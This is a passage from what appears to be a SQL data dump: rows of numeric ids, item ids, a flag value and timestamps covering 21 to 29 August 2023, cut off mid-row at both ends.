23:19:21'),(83368,1544,1,'2023-08-21','2023-08-21 23:32:14'),(83369,4520,1,'2023-08-22','2023-08-22 00:01:13'),(83370,4681,1,'2023-08-22','2023-08-22 00:09:42'),(83371,3124,1,'2023-08-22','2023-08-22 01:27:24'),(83372,5163,1,'2023-08-22','2023-08-22 01:39:41'),(83373,4756,1,'2023-08-22','2023-08-22 01:55:16'),(83374,4765,1,'2023-08-22','2023-08-22 02:06:30'),(83375,3124,1,'2023-08-22','2023-08-22 02:15:38'),(83376,4663,1,'2023-08-22','2023-08-22 02:31:16'),(83377,3735,1,'2023-08-22','2023-08-22 03:26:20'),(83378,2956,1,'2023-08-22','2023-08-22 03:27:37'),(83379,1544,1,'2023-08-22','2023-08-22 04:02:46'),(83380,4762,1,'2023-08-22','2023-08-22 04:09:25'),(83381,3087,1,'2023-08-22','2023-08-22 04:16:13'),(83382,468,1,'2023-08-22','2023-08-22 05:31:08'),(83383,2309,1,'2023-08-22','2023-08-22 05:40:05'),(83384,4756,1,'2023-08-22','2023-08-22 05:55:44'),(83385,4756,1,'2023-08-22','2023-08-22 05:55:46'),(83386,2159,1,'2023-08-22','2023-08-22 07:13:05'),(83387,473,1,'2023-08-22','2023-08-22 07:25:44'),(83388,473,1,'2023-08-22','2023-08-22 07:25:46'),(83389,469,1,'2023-08-22','2023-08-22 07:25:48'),(83390,4741,1,'2023-08-22','2023-08-22 08:55:44'),(83391,4741,1,'2023-08-22','2023-08-22 08:55:45'),(83392,4911,1,'2023-08-22','2023-08-22 09:21:09'),(83393,80,1,'2023-08-22','2023-08-22 09:22:06'),(83394,2704,1,'2023-08-22','2023-08-22 09:22:17'),(83395,1596,1,'2023-08-22','2023-08-22 09:27:47'),(83396,4582,1,'2023-08-22','2023-08-22 10:10:39'),(83397,4762,1,'2023-08-22','2023-08-22 10:25:44'),(83398,4762,1,'2023-08-22','2023-08-22 10:26:36'),(83399,1872,1,'2023-08-22','2023-08-22 11:01:55'),(83400,473,1,'2023-08-22','2023-08-22 11:01:55'),(83401,4960,1,'2023-08-22','2023-08-22 12:28:32'),(83402,4960,1,'2023-08-22','2023-08-22 12:28:47'),(83403,4654,1,'2023-08-22','2023-08-22 12:37:12'),(83404,1544,1,'2023-08-22','2023-08-22 12:42:12'),(83405,108,1,'2023-08-22','2023-08-22 12:43:59'),(83406,91,1,'2023-08-22','2023-08-22 12:44:22'),(83407,108,1,'2023-08-22','2023-08-22 12:45:04'),(83408,1544,1,'2023-08-22','2023-08-22 12:45:09'),(83409,1544,1,'2023-08-22','2023-08-22 12:56:13'),(83410,1728,1,'2023-08-22','2023-08-22 13:55:03'),(83411,68,1,'2023-08-22','2023-08-22 14:07:21'),(83412,4520,1,'2023-08-22','2023-08-22 14:52:16'),(83413,5280,1,'2023-08-22','2023-08-22 15:15:08'),(83414,467,1,'2023-08-22','2023-08-22 15:37:16'),(83415,76,1,'2023-08-22','2023-08-22 15:50:14'),(83416,3781,1,'2023-08-22','2023-08-22 16:11:51'),(83417,2309,1,'2023-08-22','2023-08-22 16:16:46'),(83418,2904,1,'2023-08-22','2023-08-22 16:52:39'),(83419,4911,1,'2023-08-22','2023-08-22 16:54:27'),(83420,1612,1,'2023-08-22','2023-08-22 16:57:59'),(83421,3781,1,'2023-08-22','2023-08-22 17:14:29'),(83422,4645,1,'2023-08-22','2023-08-22 17:46:39'),(83423,4612,1,'2023-08-22','2023-08-22 18:01:45'),(83424,5323,1,'2023-08-22','2023-08-22 18:16:42'),(83425,5356,1,'2023-08-22','2023-08-22 19:16:39'),(83426,5356,1,'2023-08-22','2023-08-22 19:17:57'),(83427,4412,1,'2023-08-22','2023-08-22 19:30:47'),(83428,4960,1,'2023-08-22','2023-08-22 20:08:36'),(83429,3079,1,'2023-08-22','2023-08-22 20:31:40'),(83430,4911,1,'2023-08-22','2023-08-22 21:48:06'),(83431,4911,1,'2023-08-22','2023-08-22 22:22:26'),(83432,2769,1,'2023-08-22','2023-08-22 22:59:26'),(83433,4911,1,'2023-08-22','2023-08-22 23:21:14'),(83434,3735,1,'2023-08-22','2023-08-22 23:52:24'),(83435,4301,1,'2023-08-23','2023-08-23 01:22:25'),(83436,3534,1,'2023-08-23','2023-08-23 01:50:20'),(83437,4950,1,'2023-08-23','2023-08-23 02:02:42'),(83438,4911,1,'2023-08-23','2023-08-23 02:06:47'),(83439,2769,1,'2023-08-23','2023-08-23 02:11:53'),(83440,4950,1,'2023-08-23','2023-08-23 03:23:06'),(83441,4301,1,'2023-08-23','2023-08-23 03:43:06'),(83442,4765,1,'2023-08-23','2023-08-23 04:43:06'),(83443,4938,1,'2023-08-23','2023-08-23 04:44:11'),(83444,4866,1,'2023-08-23','2023-08-23 07:44:10'),(83445,4762,1,'2023-08-23','2023-08-23 07:44:24'),(83446,4520,1,'2023-08-23','2023-08-23 08:31:12'),(83447,5320,1,'2023-08-23','2023-08-23 09:10:04'),(83448,4412,1,'2023-08-23','2023-08-23 09:36:09'),(83449,4960,1,'2023-08-23','2023-08-23 10:38:16'),(83450,4960,1,'2023-08-23','2023-08-23 10:40:36'),(83451,470,1,'2023-08-23','2023-08-23 11:06:29'),(83452,5276,1,'2023-08-23','2023-08-23 11:21:24'),(83453,5320,1,'2023-08-23','2023-08-23 11:36:22'),(83454,4529,1,'2023-08-23','2023-08-23 11:51:20'),(83455,5071,1,'2023-08-23','2023-08-23 12:34:30'),(83456,4587,1,'2023-08-23','2023-08-23 12:36:19'),(83457,68,1,'2023-08-23','2023-08-23 12:39:39'),(83458,4587,1,'2023-08-23','2023-08-23 12:40:08'),(83459,5140,1,'2023-08-23','2023-08-23 12:43:12'),(83460,4587,1,'2023-08-23','2023-08-23 12:44:39'),(83461,1724,1,'2023-08-23','2023-08-23 12:59:46'),(83462,4963,1,'2023-08-23','2023-08-23 13:14:33'),(83463,1588,1,'2023-08-23','2023-08-23 13:28:06'),(83464,3083,1,'2023-08-23','2023-08-23 13:49:25'),(83465,1592,1,'2023-08-23','2023-08-23 13:51:24'),(83466,4759,1,'2023-08-23','2023-08-23 13:55:23'),(83467,1596,1,'2023-08-23','2023-08-23 13:56:17'),(83468,1594,1,'2023-08-23','2023-08-23 14:06:45'),(83469,1592,1,'2023-08-23','2023-08-23 14:07:32'),(83470,4963,1,'2023-08-23','2023-08-23 14:17:13'),(83471,1602,1,'2023-08-23','2023-08-23 14:19:17'),(83472,5276,1,'2023-08-23','2023-08-23 14:21:20'),(83473,4424,1,'2023-08-23','2023-08-23 15:00:21'),(83474,84,1,'2023-08-23','2023-08-23 15:11:57'),(83475,5320,1,'2023-08-23','2023-08-23 15:13:50'),(83476,4457,1,'2023-08-23','2023-08-23 15:26:34'),(83477,5323,1,'2023-08-23','2023-08-23 16:08:31'),(83478,5280,1,'2023-08-23','2023-08-23 16:12:19'),(83479,2609,1,'2023-08-23','2023-08-23 16:30:25'),(83480,4520,1,'2023-08-23','2023-08-23 16:42:57'),(83481,3102,1,'2023-08-23','2023-08-23 16:43:51'),(83482,4744,1,'2023-08-23','2023-08-23 17:00:26'),(83483,4744,1,'2023-08-23','2023-08-23 17:00:27'),(83484,4457,1,'2023-08-23','2023-08-23 17:18:33'),(83485,5320,1,'2023-08-23','2023-08-23 17:25:10'),(83486,4930,1,'2023-08-23','2023-08-23 17:46:07'),(83487,108,1,'2023-08-23','2023-08-23 17:47:06'),(83488,4911,1,'2023-08-23','2023-08-23 17:55:14'),(83489,3066,1,'2023-08-23','2023-08-23 17:55:40'),(83490,3066,1,'2023-08-23','2023-08-23 17:57:19'),(83491,3066,1,'2023-08-23','2023-08-23 17:57:49'),(83492,3066,1,'2023-08-23','2023-08-23 18:02:13'),(83493,3735,1,'2023-08-23','2023-08-23 18:25:05'),(83494,4765,1,'2023-08-23','2023-08-23 18:30:26'),(83495,4765,1,'2023-08-23','2023-08-23 18:30:29'),(83496,5320,1,'2023-08-23','2023-08-23 19:07:24'),(83497,5163,1,'2023-08-23','2023-08-23 19:33:20'),(83498,2704,1,'2023-08-23','2023-08-23 19:34:28'),(83499,2704,1,'2023-08-23','2023-08-23 19:35:44'),(83500,2704,1,'2023-08-23','2023-08-23 19:35:58'),(83501,4996,1,'2023-08-23','2023-08-23 19:47:49'),(83502,4996,1,'2023-08-23','2023-08-23 19:47:50'),(83503,4771,1,'2023-08-23','2023-08-23 20:17:48'),(83504,4771,1,'2023-08-23','2023-08-23 20:17:50'),(83505,4645,1,'2023-08-23','2023-08-23 20:47:49'),(83506,4645,1,'2023-08-23','2023-08-23 20:47:52'),(83507,4663,1,'2023-08-23','2023-08-23 21:17:50'),(83508,4510,1,'2023-08-23','2023-08-23 21:37:24'),(83509,4582,1,'2023-08-23','2023-08-23 22:47:49'),(83510,4883,1,'2023-08-23','2023-08-23 23:08:52'),(83511,4681,1,'2023-08-23','2023-08-23 23:16:38'),(83512,5323,1,'2023-08-24','2023-08-24 01:41:40'),(83513,467,1,'2023-08-24','2023-08-24 01:41:46'),(83514,4363,1,'2023-08-24','2023-08-24 01:41:48'),(83515,4703,1,'2023-08-24','2023-08-24 01:48:24'),(83516,3124,1,'2023-08-24','2023-08-24 02:26:44'),(83517,2956,1,'2023-08-24','2023-08-24 03:01:38'),(83518,4771,1,'2023-08-24','2023-08-24 03:11:42'),(83519,2503,1,'2023-08-24','2023-08-24 03:18:28'),(83520,4412,1,'2023-08-24','2023-08-24 03:18:35'),(83521,3124,1,'2023-08-24','2023-08-24 03:46:37'),(83522,80,1,'2023-08-24','2023-08-24 05:54:06'),(83523,4703,1,'2023-08-24','2023-08-24 07:41:27'),(83524,80,1,'2023-08-24','2023-08-24 07:59:56'),(83525,68,1,'2023-08-24','2023-08-24 08:00:01'),(83526,108,1,'2023-08-24','2023-08-24 08:00:04'),(83527,3746,1,'2023-08-24','2023-08-24 08:58:34'),(83528,3746,1,'2023-08-24','2023-08-24 09:43:35'),(83529,2704,1,'2023-08-24','2023-08-24 09:48:52'),(83530,5131,1,'2023-08-24','2023-08-24 10:37:02'),(83531,89,1,'2023-08-24','2023-08-24 10:37:02'),(83532,3316,1,'2023-08-24','2023-08-24 10:49:43'),(83533,1709,1,'2023-08-24','2023-08-24 11:00:45'),(83534,1596,1,'2023-08-24','2023-08-24 11:07:36'),(83535,5371,1,'2023-08-24','2023-08-24 11:37:39'),(83536,2395,1,'2023-08-24','2023-08-24 12:14:22'),(83537,4420,1,'2023-08-24','2023-08-24 13:39:29'),(83538,4960,1,'2023-08-24','2023-08-24 14:03:54'),(83539,3316,1,'2023-08-24','2023-08-24 14:09:28'),(83540,4911,1,'2023-08-24','2023-08-24 14:26:38'),(83541,4963,1,'2023-08-24','2023-08-24 14:39:29'),(83542,5289,1,'2023-08-24','2023-08-24 14:55:33'),(83543,3746,1,'2023-08-24','2023-08-24 15:24:28'),(83544,1612,1,'2023-08-24','2023-08-24 15:52:23'),(83545,1598,1,'2023-08-24','2023-08-24 15:53:02'),(83546,468,1,'2023-08-24','2023-08-24 16:38:01'),(83547,1602,1,'2023-08-24','2023-08-24 17:07:35'),(83548,1598,1,'2023-08-24','2023-08-24 17:53:00'),(83549,4520,1,'2023-08-24','2023-08-24 18:18:58'),(83550,3746,1,'2023-08-24','2023-08-24 18:39:27'),(83551,4960,1,'2023-08-24','2023-08-24 19:04:05'),(83552,2161,1,'2023-08-24','2023-08-24 19:08:39'),(83553,4412,1,'2023-08-24','2023-08-24 19:08:40'),(83554,89,1,'2023-08-24','2023-08-24 19:14:49'),(83555,4960,1,'2023-08-24','2023-08-24 20:44:17'),(83556,2159,1,'2023-08-24','2023-08-24 21:12:44'),(83557,5054,1,'2023-08-24','2023-08-24 22:43:05'),(83558,4911,1,'2023-08-25','2023-08-25 00:30:45'),(83559,80,1,'2023-08-25','2023-08-25 00:31:09'),(83560,4911,1,'2023-08-25','2023-08-25 00:31:21'),(83561,4960,1,'2023-08-25','2023-08-25 00:54:44'),(83562,5253,1,'2023-08-25','2023-08-25 01:46:33'),(83563,76,1,'2023-08-25','2023-08-25 01:57:48'),(83564,4911,1,'2023-08-25','2023-08-25 02:09:05'),(83565,5289,1,'2023-08-25','2023-08-25 02:31:42'),(83566,467,1,'2023-08-25','2023-08-25 03:16:33'),(83567,5280,1,'2023-08-25','2023-08-25 04:01:33'),(83568,2609,1,'2023-08-25','2023-08-25 04:01:35'),(83569,4963,1,'2023-08-25','2023-08-25 04:24:59'),(83570,5163,1,'2023-08-25','2023-08-25 04:33:47'),(83571,2503,1,'2023-08-25','2023-08-25 04:46:35'),(83572,4651,1,'2023-08-25','2023-08-25 04:57:34'),(83573,4651,1,'2023-08-25','2023-08-25 04:57:36'),(83574,1606,1,'2023-08-25','2023-08-25 05:54:01'),(83575,4654,1,'2023-08-25','2023-08-25 06:27:44'),(83576,4654,1,'2023-08-25','2023-08-25 06:27:47'),(83577,2419,1,'2023-08-25','2023-08-25 08:22:45'),(83578,3735,1,'2023-08-25','2023-08-25 08:54:00'),(83579,4681,1,'2023-08-25','2023-08-25 09:30:44'),(83580,1703,1,'2023-08-25','2023-08-25 09:36:59'),(83581,68,1,'2023-08-25','2023-08-25 09:47:34'),(83582,4335,1,'2023-08-25','2023-08-25 09:48:20'),(83583,68,1,'2023-08-25','2023-08-25 09:54:24'),(83584,68,1,'2023-08-25','2023-08-25 09:57:36'),(83585,4520,1,'2023-08-25','2023-08-25 10:32:34'),(83586,5080,1,'2023-08-25','2023-08-25 10:39:42'),(83587,4960,1,'2023-08-25','2023-08-25 11:05:51'),(83588,468,1,'2023-08-25','2023-08-25 12:02:33'),(83589,4520,1,'2023-08-25','2023-08-25 12:06:36'),(83590,2704,1,'2023-08-25','2023-08-25 12:21:26'),(83591,2704,1,'2023-08-25','2023-08-25 12:23:14'),(83592,5037,1,'2023-08-25','2023-08-25 12:34:12'),(83593,4960,1,'2023-08-25','2023-08-25 12:43:10'),(83594,1596,1,'2023-08-25','2023-08-25 12:52:12'),(83595,87,1,'2023-08-25','2023-08-25 12:59:11'),(83596,91,1,'2023-08-25','2023-08-25 13:04:34'),(83597,76,1,'2023-08-25','2023-08-25 13:07:42'),(83598,5076,1,'2023-08-25','2023-08-25 14:25:06'),(83599,1774,1,'2023-08-25','2023-08-25 14:47:36'),(83600,5163,1,'2023-08-25','2023-08-25 14:54:57'),(83601,4657,1,'2023-08-25','2023-08-25 15:15:34'),(83602,4660,1,'2023-08-25','2023-08-25 15:24:00'),(83603,2152,1,'2023-08-25','2023-08-25 15:25:05'),(83604,4660,1,'2023-08-25','2023-08-25 15:30:35'),(83605,4963,1,'2023-08-25','2023-08-25 15:43:20'),(83606,2609,1,'2023-08-25','2023-08-25 15:53:35'),(83607,2769,1,'2023-08-25','2023-08-25 15:59:50'),(83608,4911,1,'2023-08-25','2023-08-25 16:08:47'),(83609,1600,1,'2023-08-25','2023-08-25 16:16:05'),(83610,4654,1,'2023-08-25','2023-08-25 16:28:31'),(83611,4988,1,'2023-08-25','2023-08-25 16:32:33'),(83612,4911,1,'2023-08-25','2023-08-25 16:36:41'),(83613,5276,1,'2023-08-25','2023-08-25 16:42:43'),(83614,4582,1,'2023-08-25','2023-08-25 16:50:27'),(83615,4651,1,'2023-08-25','2023-08-25 16:56:59'),(83616,4966,1,'2023-08-25','2023-08-25 16:57:28'),(83617,2956,1,'2023-08-25','2023-08-25 17:01:11'),(83618,5280,1,'2023-08-25','2023-08-25 17:15:33'),(83619,4412,1,'2023-08-25','2023-08-25 17:23:35'),(83620,2956,1,'2023-08-25','2023-08-25 17:23:38'),(83621,4412,1,'2023-08-25','2023-08-25 17:46:06'),(83622,5280,1,'2023-08-25','2023-08-25 18:02:40'),(83623,4744,1,'2023-08-25','2023-08-25 18:20:50'),(83624,1598,1,'2023-08-25','2023-08-25 18:41:39'),(83625,488,1,'2023-08-25','2023-08-25 18:42:39'),(83626,2617,1,'2023-08-25','2023-08-25 19:50:52'),(83627,2989,1,'2023-08-25','2023-08-25 20:09:14'),(83628,3092,1,'2023-08-25','2023-08-25 20:25:07'),(83629,4966,1,'2023-08-25','2023-08-25 20:43:20'),(83630,4966,1,'2023-08-25','2023-08-25 22:29:53'),(83631,5128,1,'2023-08-25','2023-08-25 23:02:40'),(83632,4966,1,'2023-08-25','2023-08-25 23:40:16'),(83633,4911,1,'2023-08-25','2023-08-25 23:41:54'),(83634,2769,1,'2023-08-26','2023-08-26 00:15:26'),(83635,4651,1,'2023-08-26','2023-08-26 00:27:56'),(83636,1596,1,'2023-08-26','2023-08-26 00:28:48'),(83637,3735,1,'2023-08-26','2023-08-26 00:42:40'),(83638,4966,1,'2023-08-26','2023-08-26 00:55:12'),(83639,3735,1,'2023-08-26','2023-08-26 01:27:44'),(83640,4988,1,'2023-08-26','2023-08-26 01:48:44'),(83641,5289,1,'2023-08-26','2023-08-26 01:48:46'),(83642,4657,1,'2023-08-26','2023-08-26 01:48:54'),(83643,1582,1,'2023-08-26','2023-08-26 01:50:14'),(83644,5276,1,'2023-08-26','2023-08-26 01:52:47'),(83645,4744,1,'2023-08-26','2023-08-26 01:54:48'),(83646,4582,1,'2023-08-26','2023-08-26 01:56:49'),(83647,5353,1,'2023-08-26','2023-08-26 02:08:27'),(83648,4412,1,'2023-08-26','2023-08-26 02:09:10'),(83649,4753,1,'2023-08-26','2023-08-26 02:12:30'),(83650,5356,1,'2023-08-26','2023-08-26 02:16:32'),(83651,4966,1,'2023-08-26','2023-08-26 02:28:39'),(83652,469,1,'2023-08-26','2023-08-26 02:48:50'),(83653,3742,1,'2023-08-26','2023-08-26 03:00:49'),(83654,4911,1,'2023-08-26','2023-08-26 03:10:24'),(83655,5128,1,'2023-08-26','2023-08-26 03:24:48'),(83656,4363,1,'2023-08-26','2023-08-26 03:27:35'),(83657,3742,1,'2023-08-26','2023-08-26 03:30:49'),(83658,1586,1,'2023-08-26','2023-08-26 03:42:51'),(83659,1586,1,'2023-08-26','2023-08-26 03:54:50'),(83660,1582,1,'2023-08-26','2023-08-26 04:00:51'),(83661,4648,1,'2023-08-26','2023-08-26 04:08:19'),(83662,3307,1,'2023-08-26','2023-08-26 04:15:51'),(83663,3790,1,'2023-08-26','2023-08-26 04:20:52'),(83664,469,1,'2023-08-26','2023-08-26 05:16:03'),(83665,76,1,'2023-08-26','2023-08-26 05:23:20'),(83666,2609,1,'2023-08-26','2023-08-26 05:44:27'),(83667,4911,1,'2023-08-26','2023-08-26 05:54:18'),(83668,1606,1,'2023-08-26','2023-08-26 06:20:03'),(83669,2704,1,'2023-08-26','2023-08-26 06:52:44'),(83670,4963,1,'2023-08-26','2023-08-26 08:38:22'),(83671,80,1,'2023-08-26','2023-08-26 09:25:22'),(83672,68,1,'2023-08-26','2023-08-26 09:25:26'),(83673,108,1,'2023-08-26','2023-08-26 09:25:30'),(83674,4520,1,'2023-08-26','2023-08-26 10:17:06'),(83675,4520,1,'2023-08-26','2023-08-26 10:36:15'),(83676,467,1,'2023-08-26','2023-08-26 11:37:31'),(83677,1872,1,'2023-08-26','2023-08-26 13:07:06'),(83678,5304,1,'2023-08-26','2023-08-26 13:20:19'),(83679,1872,1,'2023-08-26','2023-08-26 13:48:47'),(83680,1596,1,'2023-08-26','2023-08-26 13:48:55'),(83681,4980,1,'2023-08-26','2023-08-26 14:33:50'),(83682,5359,1,'2023-08-26','2023-08-26 14:52:50'),(83683,3764,1,'2023-08-26','2023-08-26 15:23:51'),(83684,5276,1,'2023-08-26','2023-08-26 15:37:54'),(83685,4556,1,'2023-08-26','2023-08-26 15:46:54'),(83686,3764,1,'2023-08-26','2023-08-26 15:59:17'),(83687,3764,1,'2023-08-26','2023-08-26 16:03:51'),(83688,3781,1,'2023-08-26','2023-08-26 16:12:29'),(83689,4963,1,'2023-08-26','2023-08-26 16:22:16'),(83690,4657,1,'2023-08-26','2023-08-26 17:18:47'),(83691,3240,1,'2023-08-26','2023-08-26 17:44:52'),(83692,91,1,'2023-08-26','2023-08-26 17:44:57'),(83693,3781,1,'2023-08-26','2023-08-26 18:35:17'),(83694,1608,1,'2023-08-26','2023-08-26 19:14:48'),(83695,2148,1,'2023-08-26','2023-08-26 19:56:29'),(83696,2148,1,'2023-08-26','2023-08-26 19:58:37'),(83697,4911,1,'2023-08-26','2023-08-26 23:17:42'),(83698,1612,1,'2023-08-26','2023-08-26 23:44:50'),(83699,5253,1,'2023-08-27','2023-08-27 00:23:50'),(83700,5116,1,'2023-08-27','2023-08-27 01:42:59'),(83701,3079,1,'2023-08-27','2023-08-27 01:54:07'),(83702,1612,1,'2023-08-27','2023-08-27 02:05:22'),(83703,4776,1,'2023-08-27','2023-08-27 02:17:03'),(83704,5116,1,'2023-08-27','2023-08-27 02:27:52'),(83705,2769,1,'2023-08-27','2023-08-27 02:39:05'),(83706,4963,1,'2023-08-27','2023-08-27 02:50:20'),(83707,4520,1,'2023-08-27','2023-08-27 03:12:41'),(83708,4412,1,'2023-08-27','2023-08-27 03:12:52'),(83709,5356,1,'2023-08-27','2023-08-27 03:35:20'),(83710,5353,1,'2023-08-27','2023-08-27 04:20:18'),(83711,2904,1,'2023-08-27','2023-08-27 04:45:47'),(83712,2503,1,'2023-08-27','2023-08-27 06:25:51'),(83713,5253,1,'2023-08-27','2023-08-27 06:25:55'),(83714,467,1,'2023-08-27','2023-08-27 07:10:50'),(83715,570,1,'2023-08-27','2023-08-27 07:45:34'),(83716,1608,1,'2023-08-27','2023-08-27 08:15:36'),(83717,467,1,'2023-08-27','2023-08-27 08:40:52'),(83718,4762,1,'2023-08-27','2023-08-27 09:02:24'),(83719,4960,1,'2023-08-27','2023-08-27 09:20:58'),(83720,2457,1,'2023-08-27','2023-08-27 09:51:37'),(83721,5289,1,'2023-08-27','2023-08-27 10:32:37'),(83722,1614,1,'2023-08-27','2023-08-27 12:14:46'),(83723,4960,1,'2023-08-27','2023-08-27 13:13:50'),(83724,2152,1,'2023-08-27','2023-08-27 15:21:11'),(83725,4996,1,'2023-08-27','2023-08-27 15:50:25'),(83726,4988,1,'2023-08-27','2023-08-27 16:01:21'),(83727,2152,1,'2023-08-27','2023-08-27 16:19:19'),(83728,4542,1,'2023-08-27','2023-08-27 16:50:53'),(83729,4966,1,'2023-08-27','2023-08-27 17:06:53'),(83730,4792,1,'2023-08-27','2023-08-27 17:15:36'),(83731,467,1,'2023-08-27','2023-08-27 17:48:22'),(83732,1600,1,'2023-08-27','2023-08-27 17:48:25'),(83733,5276,1,'2023-08-27','2023-08-27 18:20:53'),(83734,2503,1,'2023-08-27','2023-08-27 19:01:13'),(83735,4657,1,'2023-08-27','2023-08-27 19:20:52'),(83736,5163,1,'2023-08-27','2023-08-27 22:38:37'),(83737,80,1,'2023-08-27','2023-08-27 22:41:01'),(83738,5163,1,'2023-08-27','2023-08-27 22:42:26'),(83739,2658,1,'2023-08-27','2023-08-27 23:23:54'),(83740,5122,1,'2023-08-27','2023-08-27 23:54:30'),(83741,4524,1,'2023-08-28','2023-08-28 00:44:44'),(83742,4759,1,'2023-08-28','2023-08-28 01:34:55'),(83743,1588,1,'2023-08-28','2023-08-28 02:01:10'),(83744,4759,1,'2023-08-28','2023-08-28 02:19:10'),(83745,80,1,'2023-08-28','2023-08-28 02:40:14'),(83746,5289,1,'2023-08-28','2023-08-28 02:46:59'),(83747,4660,1,'2023-08-28','2023-08-28 03:31:18'),(83748,335,1,'2023-08-28','2023-08-28 03:36:07'),(83749,80,1,'2023-08-28','2023-08-28 04:10:24'),(83750,4648,1,'2023-08-28','2023-08-28 04:44:26'),(83751,3087,1,'2023-08-28','2023-08-28 04:44:32'),(83752,4963,1,'2023-08-28','2023-08-28 05:25:12'),(83753,467,1,'2023-08-28','2023-08-28 05:27:33'),(83754,467,1,'2023-08-28','2023-08-28 05:42:34'),(83755,2503,1,'2023-08-28','2023-08-28 06:05:09'),(83756,76,1,'2023-08-28','2023-08-28 06:25:12'),(83757,4988,1,'2023-08-28','2023-08-28 06:35:10'),(83758,4412,1,'2023-08-28','2023-08-28 06:40:12'),(83759,4612,1,'2023-08-28','2023-08-28 07:11:25'),(83760,2503,1,'2023-08-28','2023-08-28 07:20:11'),(83761,1600,1,'2023-08-28','2023-08-28 08:10:13'),(83762,2704,1,'2023-08-28','2023-08-28 08:27:57'),(83763,2704,1,'2023-08-28','2023-08-28 08:28:02'),(83764,1544,1,'2023-08-28','2023-08-28 10:24:29'),(83765,3742,1,'2023-08-28','2023-08-28 10:42:31'),(83766,3482,1,'2023-08-28','2023-08-28 10:42:32'),(83767,3498,1,'2023-08-28','2023-08-28 10:42:35'),(83768,5271,1,'2023-08-28','2023-08-28 10:42:37'),(83769,4966,1,'2023-08-28','2023-08-28 11:34:59'),(83770,5122,1,'2023-08-28','2023-08-28 11:40:18'),(83771,4938,1,'2023-08-28','2023-08-28 11:40:19'),(83772,2813,1,'2023-08-28','2023-08-28 11:40:21'),(83773,4612,1,'2023-08-28','2023-08-28 12:01:42'),(83774,4938,1,'2023-08-28','2023-08-28 12:32:24'),(83775,4691,1,'2023-08-28','2023-08-28 12:32:26'),(83776,4960,1,'2023-08-28','2023-08-28 13:00:45'),(83777,2159,1,'2023-08-28','2023-08-28 13:06:49'),(83778,473,1,'2023-08-28','2023-08-28 13:34:13'),(83779,487,1,'2023-08-28','2023-08-28 13:34:13'),(83780,487,1,'2023-08-28','2023-08-28 13:34:20'),(83781,473,1,'2023-08-28','2023-08-28 13:34:20'),(83782,2911,1,'2023-08-28','2023-08-28 13:47:19'),(83783,4988,1,'2023-08-28','2023-08-28 13:47:26'),(83784,5163,1,'2023-08-28','2023-08-28 13:47:28'),(83785,4911,1,'2023-08-28','2023-08-28 13:50:38'),(83786,5122,1,'2023-08-28','2023-08-28 13:51:06'),(83787,2911,1,'2023-08-28','2023-08-28 13:54:30'),(83788,4911,1,'2023-08-28','2023-08-28 13:59:09'),(83789,2769,1,'2023-08-28','2023-08-28 14:09:48'),(83790,5163,1,'2023-08-28','2023-08-28 14:11:17'),(83791,487,1,'2023-08-28','2023-08-28 14:14:56'),(83792,473,1,'2023-08-28','2023-08-28 14:14:56'),(83793,76,1,'2023-08-28','2023-08-28 14:17:15'),(83794,4582,1,'2023-08-28','2023-08-28 14:24:46'),(83795,1600,1,'2023-08-28','2023-08-28 14:32:20'),(83796,5356,1,'2023-08-28','2023-08-28 14:32:24'),(83797,5359,1,'2023-08-28','2023-08-28 14:47:15'),(83798,80,1,'2023-08-28','2023-08-28 14:48:08'),(83799,473,1,'2023-08-28','2023-08-28 14:56:25'),(83800,487,1,'2023-08-28','2023-08-28 14:56:25'),(83801,473,1,'2023-08-28','2023-08-28 14:59:09'),(83802,487,1,'2023-08-28','2023-08-28 14:59:09'),(83803,473,1,'2023-08-28','2023-08-28 14:59:39'),(83804,487,1,'2023-08-28','2023-08-28 14:59:39'),(83805,76,1,'2023-08-28','2023-08-28 15:02:16'),(83806,5163,1,'2023-08-28','2023-08-28 15:04:27'),(83807,1600,1,'2023-08-28','2023-08-28 15:17:17'),(83808,5276,1,'2023-08-28','2023-08-28 15:17:21'),(83809,1766,1,'2023-08-28','2023-08-28 15:23:26'),(83810,4963,1,'2023-08-28','2023-08-28 15:32:17'),(83811,4960,1,'2023-08-28','2023-08-28 15:38:08'),(83812,5289,1,'2023-08-28','2023-08-28 15:39:46'),(83813,4960,1,'2023-08-28','2023-08-28 15:40:50'),(83814,3004,1,'2023-08-28','2023-08-28 15:51:21'),(83815,4988,1,'2023-08-28','2023-08-28 16:02:20'),(83816,91,1,'2023-08-28','2023-08-28 17:39:19'),(83817,467,1,'2023-08-28','2023-08-28 18:10:03'),(83818,467,1,'2023-08-28','2023-08-28 18:55:03'),(83819,4657,1,'2023-08-28','2023-08-28 20:11:20'),(83820,4963,1,'2023-08-28','2023-08-28 20:56:22'),(83821,3079,1,'2023-08-28','2023-08-28 21:41:20'),(83822,4911,1,'2023-08-28','2023-08-28 21:51:41'),(83823,4911,1,'2023-08-28','2023-08-28 21:52:36'),(83824,2159,1,'2023-08-28','2023-08-28 22:16:50'),(83825,5353,1,'2023-08-28','2023-08-28 22:26:18'),(83826,1586,1,'2023-08-28','2023-08-28 22:46:21'),(83827,4930,1,'2023-08-28','2023-08-28 22:46:52'),(83828,4960,1,'2023-08-28','2023-08-28 22:47:08'),(83829,4930,1,'2023-08-28','2023-08-28 22:47:29'),(83830,4950,1,'2023-08-28','2023-08-28 22:47:36'),(83831,4930,1,'2023-08-28','2023-08-28 22:47:54'),(83832,1586,1,'2023-08-28','2023-08-28 22:47:59'),(83833,1614,1,'2023-08-28','2023-08-28 23:32:46'),(83834,5163,1,'2023-08-28','2023-08-28 23:46:50'),(83835,76,1,'2023-08-28','2023-08-28 23:48:03'),(83836,3781,1,'2023-08-29','2023-08-29 01:01:46'),(83837,5256,1,'2023-08-29','2023-08-29 01:41:21'),(83838,2395,1,'2023-08-29','2023-08-29 01:56:58'),(83839,1602,1,'2023-08-29','2023-08-29 02:26:22'),(83840,4332,1,'2023-08-29','2023-08-29 03:06:13'),(83841,3229,1,'2023-08-29','2023-08-29 03:11:21'),(83842,1722,1,'2023-08-29','2023-08-29 03:36:14'),(83843,4332,1,'2023-08-29','2023-08-29 03:58:44'),(83844,3691,1,'2023-08-29','2023-08-29 04:11:15'),(83845,2395,1,'2023-08-29','2023-08-29 04:21:15'),(83846,1722,1,'2023-08-29','2023-08-29 04:51:14'),(83847,1602,1,'2023-08-29','2023-08-29 04:55:41'),(83848,3229,1,'2023-08-29','2023-08-29 05:32:21'),(83849,3691,1,'2023-08-29','2023-08-29 05:39:29'),(83850,1608,1,'2023-08-29','2023-08-29 05:40:21'),(83851,1608,1,'2023-08-29','2023-08-29 06:02:54'),(83852,4238,1,'2023-08-29','2023-08-29 06:06:03'),(83853,108,1,'2023-08-29','2023-08-29 